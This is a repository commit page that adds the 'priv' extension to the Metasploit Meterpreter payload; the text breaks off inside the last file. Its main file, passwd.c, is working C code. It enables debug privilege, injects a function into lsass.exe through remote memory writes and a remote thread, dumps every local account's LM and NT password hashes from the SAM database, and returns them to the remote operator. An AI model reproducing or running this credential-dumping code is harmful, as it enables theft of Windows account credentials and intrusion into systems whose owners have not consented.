github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-18 15:14:10 +01:00
Code Releases Activity

initial import of the priv esc extension

Browse Source 
git-svn-id: file:///home/svn/incoming/trunk@3209 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Matt Miller 2005-12-13 05:59:59 +00:00
parent 14756ea60b
commit eb621baaf2
7 changed files with 900 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

15
c/meterpreter/source/extensions/priv/priv.h Normal file
View File

@ -0,0 +1,15 @@
#ifndef _METERPRETER_SOURCE_EXTENSION_PRIV_PRIV_H
#define _METERPRETER_SOURCE_EXTENSION_PRIV_PRIV_H
#include "../../common/common.h"
#define TLV_TYPE_EXTENSION_PRIV 0
#define TLV_EXTENSIONS 20000
#define TLV_TYPE_SAM_HASHES \
MAKE_CUSTOM_TLV( \
TLV_META_TYPE_STRING, \
TLV_TYPE_EXTENSION_PRIV, \
TLV_EXTENSIONS + 1)
#endif

677
c/meterpreter/source/extensions/priv/server/passwd.c Normal file
View File

@ -0,0 +1,677 @@
#include "precomp.h"
#include <stdio.h>
#include <windows.h>
#include <psapi.h>
#include <tchar.h>
#include <ntsecapi.h>
#include <string.h>
#include <stdlib.h>
#include <malloc.h>
/* define the type of information to retrieve from the SAM */
#define SAM_USER_INFO_PASSWORD_OWFS 0x12
/* define types for samsrv functions */
typedef struct _SAM_DOMAIN_USER {
DWORD dwUserId;
LSA_UNICODE_STRING wszUsername;
} SAM_DOMAIN_USER;
typedef struct _SAM_DOMAIN_USER_ENUMERATION {
DWORD dwDomainUserCount;
SAM_DOMAIN_USER *pSamDomainUser;
} SAM_DOMAIN_USER_ENUMERATION;
/* define the type for passing data */
typedef struct _USERNAMEHASH {
char *Username;
DWORD Length;
DWORD RID;
char Hash[32];
} USERNAMEHASH;
/* define types for kernel32 functions */
typedef FARPROC (WINAPI *GetProcAddressType)(HMODULE, LPCSTR);
typedef HMODULE (WINAPI *LoadLibraryType)(LPCSTR);
typedef BOOL (WINAPI *FreeLibraryType)(HMODULE);
typedef HANDLE (WINAPI *OpenEventType)(DWORD, BOOL, LPCTSTR);
typedef BOOL (WINAPI *SetEventType)(HANDLE);
typedef BOOL (WINAPI *CloseHandleType)(HANDLE);
typedef DWORD (WINAPI *WaitForSingleObjectType)(HANDLE, DWORD);
/* define the context/argument structure */
typedef struct {
/* kernel32 function pointers */
LoadLibraryType LoadLibrary;
GetProcAddressType GetProcAddress;
FreeLibraryType FreeLibrary;
OpenEventType OpenEvent;
SetEventType SetEvent;
CloseHandleType CloseHandle;
WaitForSingleObjectType WaitForSingleObject;
/* samsrv strings */
char samsrvdll[11];
char samiconnect[12];
char samropendomain[15];
char samropenuser[13];
char samrqueryinformationuser[25];
char samrenumerateusersindomain[27];
char samifree_sampr_user_info_buffer[32];
char samifree_sampr_enumeration_buffer[34];
char samrclosehandle[16];
/* advapi32 strings */
char advapi32dll[13];
char lsaopenpolicy[14];
char lsaqueryinformationpolicy[26];
char lsaclose[9];
/* msvcrt strings */
char msvcrtdll[11];
char malloc[7];
char realloc[8];
char free[5];
char memcpy[7];
/* ntdll strings */
char ntdlldll[10];
char wcstombs[9];
/* kernel sync object strings */
char ReadSyncEvent[4];
char FreeSyncEvent[5];
/* maximum wait time for sync */
DWORD dwMillisecondsToWait;
/* return values */
DWORD dwDataSize;
USERNAMEHASH *pUsernameHashData;
} FUNCTIONARGS;
/* define types for samsrv */
typedef LONG NTSTATUS;
typedef NTSTATUS (WINAPI *SamIConnectType)(DWORD, PHANDLE, DWORD, DWORD);
typedef NTSTATUS (WINAPI *SamrOpenDomainType)(HANDLE, DWORD, PSID, HANDLE *);
typedef NTSTATUS (WINAPI *SamrOpenUserType)(HANDLE, DWORD, DWORD, HANDLE *);
typedef NTSTATUS (WINAPI *SamrEnumerateUsersInDomainType)(HANDLE, HANDLE *, DWORD, SAM_DOMAIN_USER_ENUMERATION **, DWORD, DWORD *);
typedef NTSTATUS (WINAPI *SamrQueryInformationUserType)(HANDLE, DWORD, PVOID);
typedef VOID (WINAPI *SamIFree_SAMPR_USER_INFO_BUFFERType)(PVOID, DWORD);
typedef VOID (WINAPI *SamIFree_SAMPR_ENUMERATION_BUFFERType)(PVOID);
typedef NTSTATUS (WINAPI *SamrCloseHandleType)(HANDLE *);
/* define types for advapi32 */
typedef NTSTATUS (WINAPI *LsaOpenPolicyType)(PLSA_UNICODE_STRING, PLSA_OBJECT_ATTRIBUTES, ACCESS_MASK, PLSA_HANDLE);
typedef NTSTATUS (WINAPI *LsaQueryInformationPolicyType)(LSA_HANDLE, POLICY_INFORMATION_CLASS, PVOID *);
typedef NTSTATUS (WINAPI *LsaCloseType)(LSA_HANDLE);
/* define types for msvcrt */
typedef void *(*MallocType)(size_t);
typedef void *(*ReallocType)(void *, size_t);
typedef void (*FreeType)(void *);
typedef void *(*MemcpyType)(void *, const void *, size_t);
/* define types for ntdll */
typedef size_t (*WcstombsType)(char *, const wchar_t *, size_t);
char *StringCombine(char *string1, char *string2) {
if (string2 == NULL) { // nothing to append
return string1;
}
if (string1 == NULL) { // create a new string
string1 = (char *)malloc(strlen(string2) + 1);
strncpy(string1, string2, strlen(string2) + 1);
} else { // append data to the string
string1 = (char *)realloc(string1, strlen(string1) + strlen(string2) + 1);
string1 = strncat(string1, string2, strlen(string2) + 1);
}
return string1;
}
/* retrieve a handle to lsass.exe */
HANDLE GetLsassHandle() {
DWORD dwProcessList[1024];
DWORD dwProcessListSize;
HANDLE hProcess;
char szProcessName[10];
DWORD dwCount;
/* enumerate all pids on the system */
if (EnumProcesses(dwProcessList, sizeof(dwProcessList), &dwProcessListSize)) {
/* only look in the first 256 process ids for lsass.exe */
if (dwProcessListSize > sizeof(dwProcessList))
dwProcessListSize = sizeof(dwProcessList);
/* iterate through all pids, retrieve the executable name, and match to lsass.exe */
for (dwCount = 0; dwCount < dwProcessListSize; dwCount++) {
if (hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessList[dwCount])) {
if (GetModuleBaseName(hProcess, NULL, szProcessName, sizeof(szProcessName))) {
if (strcmp(szProcessName, "lsass.exe") == 0) {
return hProcess;
}
}
CloseHandle(hProcess);
}
}
}
return 0;
}
/* set the process to have the SE_DEBUG_NAME privilige */
int SetAccessPriv() {
HANDLE hToken;
TOKEN_PRIVILEGES priv;
/* open the current process token, retrieve the LUID for SeDebug, enable the privilege, reset the token information */
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) {
if (LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &priv.Privileges[0].Luid)) {
priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
priv.PrivilegeCount = 1;
if (AdjustTokenPrivileges(hToken, FALSE, &priv, 0, NULL, NULL)) {
CloseHandle(hToken);
return 1;
}
}
CloseHandle(hToken);
}
return 0;
}
int dumpSAM(FUNCTIONARGS *fargs) {
/* variables for samsrv function pointers */
HANDLE hSamSrv = NULL, hSam = NULL;
SamIConnectType pSamIConnect;
SamrOpenDomainType pSamrOpenDomain;
SamrEnumerateUsersInDomainType pSamrEnumerateUsersInDomain;
SamrOpenUserType pSamrOpenUser;
SamrQueryInformationUserType pSamrQueryInformationUser;
SamIFree_SAMPR_USER_INFO_BUFFERType pSamIFree_SAMPR_USER_INFO_BUFFER;
SamIFree_SAMPR_ENUMERATION_BUFFERType pSamIFree_SAMPR_ENUMERATION_BUFFER;
SamrCloseHandleType pSamrCloseHandle;
/* variables for samsrv functions */
HANDLE hEnumerationHandle = NULL, hDomain = NULL, hUser = NULL;
SAM_DOMAIN_USER_ENUMERATION *pEnumeratedUsers = NULL;
DWORD dwNumberOfUsers = 0;
PVOID pvUserInfo = 0;
/* variables for advapi32 function pointers */
HANDLE hAdvApi32 = NULL;
LsaOpenPolicyType pLsaOpenPolicy;
LsaQueryInformationPolicyType pLsaQueryInformationPolicy;
LsaCloseType pLsaClose;
/* variables for advapi32 functions */
LSA_HANDLE hLSA = NULL;
LSA_OBJECT_ATTRIBUTES ObjectAttributes;
POLICY_ACCOUNT_DOMAIN_INFO *pAcctDomainInfo = NULL;
/* variables for msvcrt */
HANDLE hMsvcrt = NULL;
MallocType pMalloc;
ReallocType pRealloc;
FreeType pFree;
MemcpyType pMemcpy;
/* variables for ntdll */
HANDLE hNtDll = NULL;
WcstombsType pWcstombs;
/* general variables */
NTSTATUS status;
HANDLE hReadLock = NULL, hFreeLock = NULL;
DWORD dwUsernameLength = 0, dwCurrentUser = 0, dwStorageIndex = 0;
DWORD dwError = 0;
/* load samsrv functions */
hSamSrv = fargs->LoadLibrary(fargs->samsrvdll);
if (hSamSrv == NULL) { dwError = 1; goto cleanup; }
pSamIConnect = (SamIConnectType)fargs->GetProcAddress(hSamSrv, fargs->samiconnect);
pSamrOpenDomain = (SamrOpenDomainType)fargs->GetProcAddress(hSamSrv, fargs->samropendomain);
pSamrEnumerateUsersInDomain = (SamrEnumerateUsersInDomainType)fargs->GetProcAddress(hSamSrv, fargs->samrenumerateusersindomain);
pSamrOpenUser = (SamrOpenUserType)fargs->GetProcAddress(hSamSrv, fargs->samropenuser);
pSamrQueryInformationUser = (SamrQueryInformationUserType)fargs->GetProcAddress(hSamSrv, fargs->samrqueryinformationuser);
pSamIFree_SAMPR_USER_INFO_BUFFER = (SamIFree_SAMPR_USER_INFO_BUFFERType)fargs->GetProcAddress(hSamSrv, fargs->samifree_sampr_user_info_buffer);
pSamIFree_SAMPR_ENUMERATION_BUFFER = (SamIFree_SAMPR_ENUMERATION_BUFFERType)fargs->GetProcAddress(hSamSrv, fargs->samifree_sampr_enumeration_buffer);
pSamrCloseHandle = (SamrCloseHandleType)fargs->GetProcAddress(hSamSrv, fargs->samrclosehandle);
if (!pSamIConnect || !pSamrOpenDomain || !pSamrEnumerateUsersInDomain || !pSamrOpenUser || !pSamrQueryInformationUser ||
!pSamIFree_SAMPR_USER_INFO_BUFFER || !pSamIFree_SAMPR_ENUMERATION_BUFFER || !pSamrCloseHandle) {
dwError = 1;
goto cleanup;
}
/* load advadpi32 functions */
hAdvApi32 = fargs->LoadLibrary(fargs->advapi32dll);
if (hAdvApi32 == NULL) { dwError = 1; goto cleanup; }
pLsaOpenPolicy = (LsaOpenPolicyType)fargs->GetProcAddress(hAdvApi32, fargs->lsaopenpolicy);
pLsaQueryInformationPolicy = (LsaQueryInformationPolicyType)fargs->GetProcAddress(hAdvApi32, fargs->lsaqueryinformationpolicy);
pLsaClose = (LsaCloseType)fargs->GetProcAddress(hAdvApi32, fargs->lsaclose);
if (!pLsaOpenPolicy || !pLsaQueryInformationPolicy || !pLsaClose) { dwError = 1; goto cleanup; }
/* load msvcrt functions */
hMsvcrt = fargs->LoadLibrary(fargs->msvcrtdll);
if (hMsvcrt == NULL) { dwError = 1; goto cleanup; }
pMalloc = (MallocType)fargs->GetProcAddress(hMsvcrt, fargs->malloc);
pRealloc = (ReallocType)fargs->GetProcAddress(hMsvcrt, fargs->realloc);
pFree = (FreeType)fargs->GetProcAddress(hMsvcrt, fargs->free);
pMemcpy = (MemcpyType)fargs->GetProcAddress(hMsvcrt, fargs->memcpy);
if (!pMalloc || !pRealloc || !pFree || !pMemcpy) { dwError = 1; goto cleanup; }
/* load ntdll functions */
hNtDll = fargs->LoadLibrary(fargs->ntdlldll);
if (hNtDll == NULL) { dwError = 1; goto cleanup; }
pWcstombs = (WcstombsType)fargs->GetProcAddress(hNtDll, fargs->wcstombs);
if (!pWcstombs) { dwError = 1; goto cleanup; }
/* initialize the LSA_OBJECT_ATTRIBUTES structure */
ObjectAttributes.RootDirectory = NULL;
ObjectAttributes.ObjectName = NULL;
ObjectAttributes.Attributes = 0;
ObjectAttributes.SecurityDescriptor = NULL;
ObjectAttributes.SecurityQualityOfService = NULL;
ObjectAttributes.Length = sizeof(LSA_OBJECT_ATTRIBUTES);
/* open a handle to the LSA policy */
if (pLsaOpenPolicy(NULL, &ObjectAttributes, POLICY_ALL_ACCESS, &hLSA) < 0) { dwError = 1; goto cleanup; }
if (pLsaQueryInformationPolicy(hLSA, PolicyAccountDomainInformation, &pAcctDomainInfo) < 0) { dwError = 1; goto cleanup; }
/* connect to the SAM database */
if (pSamIConnect(0, &hSam, MAXIMUM_ALLOWED, 1) < 0) { dwError = 1; goto cleanup; }
if (pSamrOpenDomain(hSam, 0xf07ff, pAcctDomainInfo->DomainSid, &hDomain) < 0) { dwError = 1; goto cleanup; }
/* enumerate all users and store username, rid, and hashes */
do {
status = pSamrEnumerateUsersInDomain(hDomain, &hEnumerationHandle, 0, &pEnumeratedUsers, 0xFFFF, &dwNumberOfUsers);
if (status < 0) { break; } // error
// 0x0 = no more, 0x105 = more users
if (!dwNumberOfUsers) { break; } // exit if no users remain
if (fargs->dwDataSize == 0) { // first allocation
fargs->dwDataSize = dwNumberOfUsers * sizeof(USERNAMEHASH);
fargs->pUsernameHashData = pMalloc(fargs->dwDataSize);
} else { // subsequent allocations
fargs->dwDataSize += dwNumberOfUsers * sizeof(USERNAMEHASH);
fargs->pUsernameHashData = pRealloc(fargs->pUsernameHashData, fargs->dwDataSize);
}
if (fargs->pUsernameHashData == NULL) { dwError = 1; goto cleanup; }
for (dwCurrentUser = 0; dwCurrentUser < dwNumberOfUsers; dwCurrentUser++) {
if (pSamrOpenUser(hDomain, MAXIMUM_ALLOWED, pEnumeratedUsers->pSamDomainUser[dwCurrentUser].dwUserId, &hUser) < 0) { dwError = 1; goto cleanup; }
if (pSamrQueryInformationUser(hUser, SAM_USER_INFO_PASSWORD_OWFS, &pvUserInfo) < 0) { dwError = 1; goto cleanup; }
/* allocate space for another username */
dwUsernameLength = (pEnumeratedUsers->pSamDomainUser[dwCurrentUser].wszUsername.Length / 2) + 1;
(fargs->pUsernameHashData)[dwStorageIndex].Username = (char *)pMalloc(dwUsernameLength);
if ((fargs->pUsernameHashData)[dwStorageIndex].Username == NULL) { dwError = 1; goto cleanup; }
/* copy over the new name, length, rid and password hash */
pWcstombs((fargs->pUsernameHashData)[dwStorageIndex].Username, pEnumeratedUsers->pSamDomainUser[dwCurrentUser].wszUsername.Buffer, dwUsernameLength);
(fargs->pUsernameHashData)[dwStorageIndex].Length = dwUsernameLength;
(fargs->pUsernameHashData)[dwStorageIndex].RID = pEnumeratedUsers->pSamDomainUser[dwCurrentUser].dwUserId;
pMemcpy((fargs->pUsernameHashData)[dwStorageIndex].Hash, pvUserInfo, 32);
/* clean up */
pSamIFree_SAMPR_USER_INFO_BUFFER(pvUserInfo, SAM_USER_INFO_PASSWORD_OWFS);
pSamrCloseHandle(&hUser);
pvUserInfo = 0;
hUser = 0;
/* move to the next storage element */
dwStorageIndex++;
}
pSamIFree_SAMPR_ENUMERATION_BUFFER(pEnumeratedUsers);
pEnumeratedUsers = NULL;
} while (status == 0x105);
/* set the event to signify that the data is ready */
hReadLock = fargs->OpenEvent(EVENT_MODIFY_STATE, FALSE, fargs->ReadSyncEvent);
if (hReadLock == NULL) { dwError = 1; goto cleanup; }
if (fargs->SetEvent(hReadLock) == 0) { dwError = 1; goto cleanup; }
/* wait for the copying to finish before freeing all the allocated memory */
hFreeLock = fargs->OpenEvent(EVENT_ALL_ACCESS, FALSE, fargs->FreeSyncEvent);
if (hFreeLock == NULL) { dwError = 1; goto cleanup; }
if (fargs->WaitForSingleObject(hFreeLock, fargs->dwMillisecondsToWait) != WAIT_OBJECT_0) { dwError = 1; goto cleanup; }
cleanup:
/* free all the allocated memory */
for (dwCurrentUser = 0; dwCurrentUser < dwStorageIndex; dwCurrentUser++) {
pFree((fargs->pUsernameHashData)[dwCurrentUser].Username);
}
pFree(fargs->pUsernameHashData);
/* close all handles */
pSamrCloseHandle(&hDomain);
pSamrCloseHandle(&hSam);
pLsaClose(hLSA);
/* free library handles */
if (hSamSrv) { fargs->FreeLibrary(hSamSrv); }
if (hAdvApi32) { fargs->FreeLibrary(hAdvApi32); }
if (hMsvcrt) { fargs->FreeLibrary(hMsvcrt); }
if (hNtDll) { fargs->FreeLibrary(hNtDll); }
/* signal that the memory deallocation is complete */
fargs->SetEvent(hReadLock);
fargs->CloseHandle(hReadLock);
/* release the free handle */
fargs->CloseHandle(hFreeLock);
/* return correct code */
return dwError;
}
void sizer() { __asm { ret } }
/* initialize the context structure - returns 0 on success, return 1 on error */
int setArgs(FUNCTIONARGS *fargs, DWORD dwMillisecondsToWait) {
HANDLE hLibrary = NULL;
/* set loadlibrary and getprocaddress function addresses */
hLibrary = LoadLibrary("kernel32");
if (hLibrary == NULL) { return 1; }
fargs->LoadLibrary = (LoadLibraryType)GetProcAddress(hLibrary, "LoadLibraryA");
fargs->GetProcAddress = (GetProcAddressType)GetProcAddress(hLibrary, "GetProcAddress");
fargs->FreeLibrary = (FreeLibraryType)GetProcAddress(hLibrary, "FreeLibrary");
fargs->OpenEvent = (OpenEventType)GetProcAddress(hLibrary, "OpenEventA");
fargs->SetEvent = (SetEventType)GetProcAddress(hLibrary, "SetEvent");
fargs->CloseHandle = (CloseHandleType)GetProcAddress(hLibrary, "CloseHandle");
fargs->WaitForSingleObject = (WaitForSingleObjectType)GetProcAddress(hLibrary, "WaitForSingleObject");
if (!fargs->LoadLibrary || !fargs->GetProcAddress || !fargs->FreeLibrary || !fargs->OpenEvent || !fargs->SetEvent || !fargs->CloseHandle || !fargs->WaitForSingleObject) {
CloseHandle(hLibrary);
return 1;
}
/* initialize samsrv strings */
strncpy(fargs->samsrvdll, "samsrv.dll", sizeof(fargs->samsrvdll));
strncpy(fargs->samiconnect, "SamIConnect", sizeof(fargs->samiconnect));
strncpy(fargs->samropendomain, "SamrOpenDomain", sizeof(fargs->samropendomain));
strncpy(fargs->samropenuser, "SamrOpenUser", sizeof(fargs->samropenuser));
strncpy(fargs->samrqueryinformationuser, "SamrQueryInformationUser", sizeof(fargs->samrqueryinformationuser));
strncpy(fargs->samrenumerateusersindomain, "SamrEnumerateUsersInDomain", sizeof(fargs->samrenumerateusersindomain));
strncpy(fargs->samifree_sampr_user_info_buffer, "SamIFree_SAMPR_USER_INFO_BUFFER", sizeof(fargs->samifree_sampr_user_info_buffer));
strncpy(fargs->samifree_sampr_enumeration_buffer, "SamIFree_SAMPR_ENUMERATION_BUFFER", sizeof(fargs->samifree_sampr_enumeration_buffer));
strncpy(fargs->samrclosehandle, "SamrCloseHandle", sizeof(fargs->samrclosehandle));
/* initialize advapi32 strings */
strncpy(fargs->advapi32dll, "advapi32.dll", sizeof(fargs->advapi32dll));
strncpy(fargs->lsaopenpolicy, "LsaOpenPolicy", sizeof(fargs->lsaopenpolicy));
strncpy(fargs->lsaqueryinformationpolicy, "LsaQueryInformationPolicy", sizeof(fargs->lsaqueryinformationpolicy));
strncpy(fargs->lsaclose, "LsaClose", sizeof(fargs->lsaclose));
/* initialize msvcrt strings */
strncpy(fargs->msvcrtdll, "msvcrt.dll", sizeof(fargs->msvcrtdll));
strncpy(fargs->malloc, "malloc", sizeof(fargs->malloc));
strncpy(fargs->realloc, "realloc", sizeof(fargs->realloc));
strncpy(fargs->free, "free", sizeof(fargs->free));
strncpy(fargs->memcpy, "memcpy", sizeof(fargs->memcpy));
/* initialize ntdll strings */
strncpy(fargs->ntdlldll, "ntdll.dll", sizeof(fargs->ntdlldll));
strncpy(fargs->wcstombs, "wcstombs", sizeof(fargs->wcstombs));
/* initialize kernel sync objects */
strncpy(fargs->ReadSyncEvent, "SAM", sizeof(fargs->ReadSyncEvent));
strncpy(fargs->FreeSyncEvent, "FREE", sizeof(fargs->FreeSyncEvent));
/* initialize wait time */
fargs->dwMillisecondsToWait = dwMillisecondsToWait;
/* initailize variables */
fargs->dwDataSize = 0;
fargs->pUsernameHashData = NULL;
/* clean up */
CloseHandle(hLibrary);
return 0;
}
/*
control function driving the dumping - return 0 on success, 1 on error
dwMillisecondsToWait = basically controls how long to wait for the results
*/
int __declspec(dllexport) control(DWORD dwMillisecondsToWait, char **hashresults) {
HANDLE hThreadHandle = NULL, hLsassHandle = NULL, hReadLock = NULL, hFreeLock = NULL;
LPVOID pvParameterMemory = NULL, pvFunctionMemory = NULL;
int FunctionSize;
DWORD dwBytesWritten = 0, dwThreadId = 0, dwBytesRead = 0, dwNumberOfUsers = 0, dwCurrentUserIndex = 0, HashIndex = 0;
FUNCTIONARGS InitFunctionArguments, FinalFunctionArguments;
USERNAMEHASH *UsernameHashResults = NULL;
PVOID UsernameAddress = NULL;
DWORD dwError = 0;
char *hashstring = NULL;
/* METERPRETER CODE */
char buffer[100];
/* END METERPRETER CODE */
do {
/* ORANGE control input - move this to the client perl side */
if (dwMillisecondsToWait < 60000) { dwMillisecondsToWait = 60000; }
if (dwMillisecondsToWait > 300000) { dwMillisecondsToWait = 300000; }
/* create the event kernel sync objects */
hReadLock = CreateEvent(NULL, FALSE, FALSE, "SAM");
hFreeLock = CreateEvent(NULL, FALSE, FALSE, "FREE");
if (!hReadLock || !hFreeLock) { dwError = 1; break; }
/* calculate the function size */
FunctionSize = (DWORD)sizer - (DWORD)dumpSAM;
if (FunctionSize <= 0) {
printf("Error calculating the function size.\n");
dwError = 1;
break;
}
/* set access priv */
if (SetAccessPriv() == 0) {
printf("Error setting SE_DEBUG_NAME privilege\n");
dwError = 1;
break;
}
/* get the lsass handle */
hLsassHandle = GetLsassHandle();
if (hLsassHandle == 0) {
printf("Error getting lsass.exe handle.\n");
dwError = 1;
break;
}
/* set the arguments in the context structure */
if (setArgs(&InitFunctionArguments, dwMillisecondsToWait)) { dwError = 1; break; }
/* allocate memory for the context structure */
pvParameterMemory = VirtualAllocEx(hLsassHandle, NULL, sizeof(FUNCTIONARGS), MEM_COMMIT, PAGE_READWRITE);
if (pvParameterMemory == NULL) { dwError = 1; break; }
/* write context structure into remote process */
if (WriteProcessMemory(hLsassHandle, pvParameterMemory, &InitFunctionArguments, sizeof(InitFunctionArguments), &dwBytesWritten) == 0) { dwError = 1; break; }
if (dwBytesWritten != sizeof(InitFunctionArguments)) { dwError = 1; break; }
dwBytesWritten = 0;
/* allocate memory for the function */
pvFunctionMemory = VirtualAllocEx(hLsassHandle, NULL, FunctionSize, MEM_COMMIT, PAGE_READWRITE);
if (pvFunctionMemory == NULL) { dwError = 1; break; }
/* write the function into the remote process */
if (WriteProcessMemory(hLsassHandle, pvFunctionMemory, dumpSAM, FunctionSize, &dwBytesWritten) == 0) { dwError = 1; break; }
if (dwBytesWritten != FunctionSize) { dwError = 1; break; }
dwBytesWritten = 0;
/* start the remote thread */
if ((hThreadHandle = CreateRemoteThread(hLsassHandle, NULL, 0, (LPTHREAD_START_ROUTINE)pvFunctionMemory, pvParameterMemory, NULL, &dwThreadId)) == NULL) { dwError = 1; break; }
/* wait until the data is ready to be collected */
if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0) {
printf("Timed out waiting for the data to be collected.\n");
dwError = 1;
break;
}
/* read results of the injected function */
if (ReadProcessMemory(hLsassHandle, pvParameterMemory, &FinalFunctionArguments, sizeof(InitFunctionArguments), &dwBytesRead) == 0) { dwError = 1; break; }
if (dwBytesRead != sizeof(InitFunctionArguments)) { dwError = 1; break; }
dwBytesRead = 0;
/* allocate space for the results */
UsernameHashResults = (USERNAMEHASH *)malloc(FinalFunctionArguments.dwDataSize);
if (UsernameHashResults == NULL) { dwError = 1; break; }
/* determine the number of elements and copy over the data */
dwNumberOfUsers = FinalFunctionArguments.dwDataSize / sizeof(USERNAMEHASH);
/* copy the context structure */
if (ReadProcessMemory(hLsassHandle, FinalFunctionArguments.pUsernameHashData, UsernameHashResults, FinalFunctionArguments.dwDataSize, &dwBytesRead) == 0) { break; }
if (dwBytesRead != FinalFunctionArguments.dwDataSize) { break; }
dwBytesRead = 0;
// save the old mem addy, malloc new space, copy over the data, free the old mem addy
for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++) {
UsernameAddress = UsernameHashResults[dwCurrentUserIndex].Username;
UsernameHashResults[dwCurrentUserIndex].Username = (char *)malloc(UsernameHashResults[dwCurrentUserIndex].Length);
if (UsernameHashResults[dwCurrentUserIndex].Username == NULL) { dwError = 1; break; }
if (ReadProcessMemory(hLsassHandle, UsernameAddress, UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].Length, &dwBytesRead) == 0) { dwError = 1; break; }
if (dwBytesRead != UsernameHashResults[dwCurrentUserIndex].Length) { dwError = 1; break; }
}
/* signal that all data has been read and wait for the remote memory to be free'd */
if (SetEvent(hFreeLock) == 0) { dwError = 1; break; }
if (WaitForSingleObject(hReadLock, dwMillisecondsToWait) != WAIT_OBJECT_0) {
printf("The timeout pooped.\n");
dwError = 1;
break;
}
/* display the results and free the malloc'd memory for the username */
for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++) {
/* METERPRETER CODE */
hashstring = StringCombine(hashstring, UsernameHashResults[dwCurrentUserIndex].Username);
hashstring = StringCombine(hashstring, ":");
_snprintf(buffer, 30, "%d", UsernameHashResults[dwCurrentUserIndex].RID);
hashstring = StringCombine(hashstring, buffer);
hashstring = StringCombine(hashstring, ":");
/* END METERPRETER CODE */
//printf("%s:%d:", UsernameHashResults[dwCurrentUserIndex].Username, UsernameHashResults[dwCurrentUserIndex].RID);
for (HashIndex = 16; HashIndex < 32; HashIndex++) {
/* ORANGE - insert check for ***NO PASSWORD***
if( (regData[4] == 0x35b4d3aa) && (regData[5] == 0xee0414b5)
&& (regData[6] == 0x35b4d3aa) && (regData[7] == 0xee0414b5) )
sprintf( LMdata, "NO PASSWORD*********************" );
*/
_snprintf(buffer, 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
hashstring = StringCombine(hashstring, buffer);
//printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
}
hashstring = StringCombine(hashstring, ":");
//printf(":");
for (HashIndex = 0; HashIndex < 16; HashIndex++) {
/* ORANGE - insert check for ***NO PASSWORD***
if( (regData[0] == 0xe0cfd631) && (regData[1] == 0x31e96ad1)
&& (regData[2] == 0xd7593cb7) && (regData[3] == 0xc089c0e0) )
sprintf( NTdata, "NO PASSWORD*********************" );
*/
_snprintf(buffer, 3, "%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
hashstring = StringCombine(hashstring, buffer);
//printf("%02x", (BYTE)(UsernameHashResults[dwCurrentUserIndex].Hash[HashIndex]));
}
hashstring = StringCombine(hashstring, ":::\n");
//printf(":::\n");
}
} while(0);
/* relesase the event objects */
if (hReadLock) { CloseHandle(hReadLock); }
if (hFreeLock) { CloseHandle(hFreeLock); }
/* close handle to lsass */
if (hLsassHandle) { CloseHandle(hLsassHandle); }
/* free the context structure and the injected function and the results */
if (pvParameterMemory) { VirtualFreeEx(hLsassHandle, pvParameterMemory, sizeof(FUNCTIONARGS), MEM_RELEASE); }
if (pvFunctionMemory) { VirtualFreeEx(hLsassHandle, pvFunctionMemory, FunctionSize, MEM_RELEASE); }
/* free the remote thread handle */
if (hThreadHandle) { CloseHandle(hThreadHandle); }
/* free the results structure including individually malloced space for usernames */
if (UsernameHashResults) {
for (dwCurrentUserIndex = 0; dwCurrentUserIndex < dwNumberOfUsers; dwCurrentUserIndex++) {
if (UsernameHashResults[dwCurrentUserIndex].Username) {
free(UsernameHashResults[dwCurrentUserIndex].Username);
}
}
free(UsernameHashResults);
}
/* return hashresults */
*hashresults = hashstring;
/* return the correct code */
return dwError;
}
/*
* Grabs the LanMan Hashes from the SAM database.
*/
DWORD request_passwd_get_sam_hashes(Remote *remote, Packet *packet)
{
Packet *response = packet_create_response(packet);
DWORD res = ERROR_SUCCESS;
char *hashes = NULL;
do
{
// Get the hashes
if (control(120000, &hashes))
{
res = GetLastError();
break;
}
packet_add_tlv_string(response, TLV_TYPE_SAM_HASHES, hashes);
} while (0);
packet_transmit_response(res, remote, response);
if (hashes)
free(hashes);
return res;
}

6
c/meterpreter/source/extensions/priv/server/passwd.h Normal file
View File

@ -0,0 +1,6 @@
#ifndef _METERPRETER_SOURCE_EXTENSION_PRIV_PRIV_SERVER_PASSWD_H
#define _METERPRETER_SOURCE_EXTENSION_PRIV_PRIV_SERVER_PASSWD_H
DWORD request_passwd_get_sam_hashes(Remote *remote, Packet *packet);
#endif

10
c/meterpreter/source/extensions/priv/server/precomp.h Normal file
View File

@ -0,0 +1,10 @@
#ifndef METERPRETER_SOURCE_EXTENSION_PRIV_SERVER_PRECOMP_H
#define METERPRETER_SOURCE_EXTENSION_PRIV_SERVER_PRECOMP_H
#define _WIN32_WINNT 0x0400
#include "../priv.h"
#include "passwd.h"
#define strcasecmp stricmp
#endif

57
c/meterpreter/source/extensions/priv/server/priv.c Normal file
View File

@ -0,0 +1,57 @@
/*
* This module implements privilege escalation features.
*/
#include "precomp.h"
Command customCommands[] =
{
// Priv
{ "priv_passwd_get_sam_hashes",
{ request_passwd_get_sam_hashes, { 0 }, 0 },
{ EMPTY_DISPATCH_HANDLER },
},
// Terminator
{ NULL,
{ EMPTY_DISPATCH_HANDLER },
{ EMPTY_DISPATCH_HANDLER },
},
};
/*
* Initialize the server extension
*/
DWORD __declspec(dllexport) InitServerExtension(Remote *remote)
{
DWORD index;
for (index = 0;
customCommands[index].method;
index++)
command_register(&customCommands[index]);
return ERROR_SUCCESS;
}
/*
* Deinitialize the server extension
*/
DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote)
{
DWORD index;
for (index = 0;
customCommands[index].method;
index++)
command_deregister(&customCommands[index]);
return ERROR_SUCCESS;
}
/*
* DLL entry point for persisting the module handle
